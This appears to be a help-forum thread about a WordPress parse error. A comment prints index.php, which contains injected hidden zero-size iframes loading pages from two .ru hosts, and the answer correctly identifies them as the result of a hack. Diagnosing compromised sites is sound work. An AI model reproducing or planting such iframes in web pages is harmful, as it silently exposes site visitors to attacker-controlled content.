# Wordpress Blog error

Tags: wordpress

When we point the URL to http://iffort.com/blog/ we're getting the error below:

Parse error: syntax error, unexpected T_STRING in /home/iffortc/public_html/blog/index.php on line 18

Comment: You need to elaborate, What is your question? What does the error mean? If you need general support for Wordpress, you're best course of action is to contact Automattic or Wordpress.org

Comment: You'll have to show us the source for index.php. If it's too big, post lines 1-30ish

Comment: <?php
require('./wp-blog-
<iframe frameborder="0" onload="if (!this.src){ this.src='http://testilla.ru:8080/index.php'; this.height='0'; this.width='0';}" >nlzqctnlgvazcietqbvlkxo
<iframe frameborder="0" onload="if (!this.src){ this.src='http://testoogle.ru:8080/index.php'; this.height='0'; this.width='0';}" >ccbmkbakoftmbftlcdzpfttewciiweg</iframe>

Answer (score 1):

That's iFrame code from a hack. Your wordpress install got hacked, so read [FAQ: My site was hacked « WordPress Codex](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [How to Completely Clean a Hacked Wordpress Install](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) and [How to find a backdoor in a hacked WordPress](http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/)